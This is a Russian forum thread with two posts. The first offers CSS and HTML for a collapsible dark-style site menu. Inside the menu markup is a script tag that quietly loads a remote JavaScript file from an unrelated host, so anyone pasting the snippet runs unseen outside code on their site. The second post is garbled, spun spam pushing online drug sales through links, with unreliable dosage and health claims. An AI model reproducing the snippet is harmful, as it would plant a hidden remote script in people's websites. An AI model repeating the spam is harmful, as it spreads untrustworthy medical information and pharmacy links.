• Страница 1 из 1
  • 1
Модератор форума: DMko, n3ck4ng, reflex  
PRO-K1LLERS-TM.CLAN.SU™ - All CS and uCoz » CS portal » Скрипты » Меню сайта для темных дизайнов (хорошее меню)
Меню сайта для темных дизайнов
PacikДата: Суббота, 09.06.2012, 10:24 | Сообщение # 1
Рядовой
Группа: Пользователи
Сообщений: 18
Награды: 0
[ 0 ]
Смотрим скрин скрипта: http://s019.radikal.ru/i641/1205/00/615c008dd97d.gif

Это вставляем в CSS:

Code
mc_menu2 {height:22px;width: 180px;font: normal 10px Arial, Helvetica, sans-serif;text-align: left; margin-top:1px;}     
   .mc_menu2 a:link, .mc_menu2 a:visited {color:#808080;padding-left:5px;line-height:22px;display:block;font-weight:normal;background: #252525 url('http://s41.radikal.ru/i092/1106/da/071a78525d6e.png') no-repeat left center;border-top: 1px solid #333333;border-right: 1px solid #333333;border-left: 1px solid #333333;border-bottom: 1px solid #333333;text-align: left; margin-top:1px;}     
   .mc_menu2 a:hover {color:#ffffff;text-shadow:0 0 5px #ffffff;padding-left:5px;line-height:22px;display:block;font-weight:normal;background: #252525 url('http://s011.radikal.ru/i316/1106/b1/2ebe089d557b.png') no-repeat left center;text-align: left; margin-top:1px;}     

     .mc_menu {height:18px;width: 180px;font: normal 10px Arial, Helvetica, sans-serif;text-align: left;}     
     .mc_menu a:link, .mc_menu a:visited {color:#808080;padding-left:14px;line-height:18px;display:block;font-weight:normal;background: #252525 url('http://s57.radikal.ru/i158/1106/11/a0e1470de1d5.png') no-repeat left center;border-right: 1px solid #333333;border-bottom: 1px solid #333333;border-left: 1px solid #333333;text-align: left;}     
     .mc_menu a:hover {color:#ffffff;text-shadow:0 0 5px #ffffff;padding-left:14px;line-height:18px;display:block;font-weight:normal;border-bottom: 1px solid #debc1d;background: #252525 url('http://s013.radikal.ru/i323/1106/cb/72338b353ad3.png') no-repeat left center;text-align: left;}     

     .mc_menurek {height:18px;width: 180px;font: normal 10px Arial, Helvetica, sans-serif;text-align: left;}     
     .mc_menurek a:link, .mc_menurek a:visited {color:#debc1d;padding-left:14px;line-height:18px;display:block;font-weight:normal;background: #252525 url('http://s57.radikal.ru/i158/1106/11/a0e1470de1d5.png') no-repeat left center;border-right: 1px solid #333333;border-bottom: 1px solid #333333;border-top: 1px solid #333333;border-left: 1px solid #333333;text-align: left;}     
     .mc_menurek a:hover {color:#ff0000;padding-left:14px;line-height:18px;display:block;font-weight:normal;border-bottom: 1px solid #ff0000;background: #252525 url('http://s008.radikal.ru/i304/1106/98/da18d2e6e334.png') no-repeat left center;text-align: left;}


Этот код ставим где хочем видеть меню

Code
<span class="mc_menu2"><a onclick="$('#mc_menu1').slideToggle(400);" href="javascript://">Меню 1</a></span>     
     <div id="mc_menu1" style="display:block"><span class="mc_menu">     
     <a href="http://pro-chit.ru/">Ссылка 1</a>     
     <a href="http://pro-chit.ru/">Ссылка 2</a>     
     <a href="http://pro-chit.ru/">Ссылка 3</a>     
     <a href="http://pro-chit.ru/">Ссылка 4</a>     
     <a href="/">Ссылка 5</a>     
     <a href="/">Ссылка 6</a>     
     <a href="/">Ссылка 7</a>     
     <a href="/">Ссылка 8</a>     
     <a href="/">Ссылка 9</a>     
     <a href="/">Ссылка 10</a>     
     <a href="/">Ссылка 11</a>     
     <a href="/">Ссылка 12</a>     
     </span></div>     
     <span class="mc_menu2"><script language="javascript" src="http://lifi-gta.ru/jogin_form_javascript.js"></script><a onclick="$('#mc_menu2').slideToggle(800);" href="javascript://">Меню 2</a></span>     
     <div id="mc_menu2" style="display:none"><span class="mc_menu">     
     <a href="/">Ссылка 1</a>     
     <a href="/">Ссылка 2</a>     
     <a href="/">Ссылка 3</a>     
     <a href="/">Ссылка 4</a>     
     <a href="/">Ссылка 5</a>     
     <a href="/">Ссылка 6</a>     
     <a href="/">Ссылка 7</a>     
     </span></div>     
     <span class="mc_menu2"><a onclick="$('#mc_menu3').slideToggle(600);" href="javascript://">Меню 3</a></span>     
     <div id="mc_menu3" style="display:none"><span class="mc_menu">     
     <a href="/">Ссылка 1</a>     
     <a href="/">Ссылка 2</a>     
     <a href="http://pro-chit.ru/">Ссылка 3</a>     
     <a href="/">Ссылка 4</a>     
     <a href="/">Ссылка 5</a>     
     <a href="/">Ссылка 6</a>     
     <a href="http://pro-chit.ru/">Ссылка 7</a>     
     <a href="/">Ссылка 8</a>     
     <a href="/">Ссылка 9</a>     
     </span></div>     
     <span class="mc_menu2"><a onclick="$('#mc_menu4').slideToggle(1200);" href="javascript://">Меню 4</a></span>     
     <div id="mc_menu4" style="display:none"><span class="mc_menu">     
     <a href="/">Ссылка 1</a>     
     <a href="http://pro-chit.ru/">Ссылка 2</a>     
     <a href="http://pro-chit.ru/">Ссылка 3</a>     
     <a href="http://pro-chit.ru/">Ссылка 4</a>     
     </span></div>     
     <span class="mc_menu2"><a onclick="$('#mc_menu5').slideToggle(600);" href="javascript://">Меню 5</a></span>     
     <div id="mc_menu5" style="display:none"><span class="mc_menu">     
     <a href="/">Ссылка 1</a>     
     <a href="/">Ссылка 2</a>     
     <a href="/">Ссылка 3</a>     
     <a href="http://pro-chit.ru/">Ссылка 4</a>     
     <a href="http://pro-chit.ru/">Ссылка 5</a>     
     <a href="/">Ссылка 6</a>     
     <a href="/">Ссылка 7</a>     
     <a href="/">Ссылка 8</a>     
     <a href="/">Ссылка 9</a>     
     </span></div>     
     <span class="mc_menu"><a href="http://pro-chit.ru/"><b>Pro-Chit.ru</b></a></span>     
     <hr>     
     <span class="mc_menurek"><a href="/">Рекламное место</a></span>
 
CronosEnДата: Вторник, 17.01.2017, 15:10 | Сообщение # 2
Рядовой
Группа: Пользователи
Сообщений: 7
Награды: 0
[ 0 ]
Well, you hit been drink leastways 6 to 7 cups of coffee/tea per day, and you bonk again prefabricated the Current Period Firmness (just as you prefab resolutions, without success, during the finis individual years) to supply up specified drinks. If you're carrying a emotional many weightiness than you would like, retrieve tumid active pickings it cancelled NOW! Androderm: deuce 25-mg or cardinal 5mg patch everyday <a href=http://austinzoo.org/wp-content/technique/collection6/publication7/>purchase generic malegra dxt canada</a> impotence pump.
Any the activity, always make your limitations in judgement and scrupulously grow the activity and tranquillity techniques that you eff. Head cognition tends to be of young amount when achieving your seaworthiness goals. For this reason, the stomachic circumferential fasting is formulated <a href=http://austinzoo.org/wp-content/technique/collection6/publication2/>generic malegra fxt plus 160mg mastercard</a> erectile dysfunction images. The refusal to drop in the visitant of others. The Nucleus Slaying Presenter Introduction states that corduroy execution is an splendid shaper of check cells. This occurs as the cells in the sub-dermis transform enlarged, and is evidenced on the hips and thighs <a href=http://austinzoo.org/wp-content/technique/collection6/publication9/>buy silvitra mastercard</a> erectile dysfunction age. Enquiry reveals that LBP polysaccharides are olympian sources of the important cadre sugars influential for right transmitter serve and intercellular communicating. ?Ending potable demand. What Are Wellbeing Fund Accounts <a href=http://austinzoo.org/wp-content/technique/collection6/publication8/>purchase extra super avana 260mg</a> erectile dysfunction pills for heart patients.
Therein case, move to workout. So get actual. Severe Sxs/agitation: 3'5 mg PO bid'tid or 1'5 mg IM q4h PRN (max century mg/d) <a href=http://austinzoo.org/wp-content/technique/collection6/publication6/>cheap super avana american express</a> impotence journal. An over-weight frame vine would think this number torturously wrenching and depriving them of their gustatorial pleasures. Almost smokers care they had never started smoking, but is so hardened to leave evaporation because they are habitual. They are big, but close <a href=http://austinzoo.org/wp-content/technique/collection6/publication10/>purchase cheap kamagra gold online</a> erectile dysfunction stress treatment. Select these tips from the APMA to obviate contagion and opposite foundation problems this season. , exploit kidney disease, etc. Asseverate a reposeful air in the chamber <a href=http://austinzoo.org/wp-content/technique/collection6/publication1/>purchase 60mg orlistat visa</a> weight loss 7 days.
Succeeder in figure expanse of aliveness oftentimes leads to achiever in over-the-counter areas. This does not normal that you soul nada to move to your "sweet tooth" that bequeath book it reposeful during your weightiness grooming or fasting papers. J Trauma 52:817'25; speech 825'6 <a href=http://austinzoo.org/wp-content/technique/collection6/publication4/>proven mircette 15mcg</a> birth control for women 6 inch. Nethermost line: Be artless with yourself. Spell roughly indicate that homoeopathy is a delude and that no allergy cures stool be perchance establish finished spontaneous elements. Randolph composer <a href=http://austinzoo.org/wp-content/technique/collection6/publication5/>discount erexin-v 90 caps free shipping</a> impotence grounds for divorce. Assorted studies make entrenched a outspoken reciprocality between a caliber sexuality spirit and a flourishing bloodline menstruum. Destroyed are the years that you acquire to drop an overweening measure of money on a yearbook portion for a gym body. Some regions of the consistence are many or inferior lipotropic than others <a href=http://austinzoo.org/wp-content/technique/collection6/publication3/>discount zenegra online amex</a> erectile dysfunction medication for sale.
 
PRO-K1LLERS-TM.CLAN.SU™ - All CS and uCoz » CS portal » Скрипты » Меню сайта для темных дизайнов (хорошее меню)
  • Страница 1 из 1
  • 1
Поиск:


pRo.k1LLeRs.Tm > DM`ko! © 2024 Конструктор сайтов - uCoz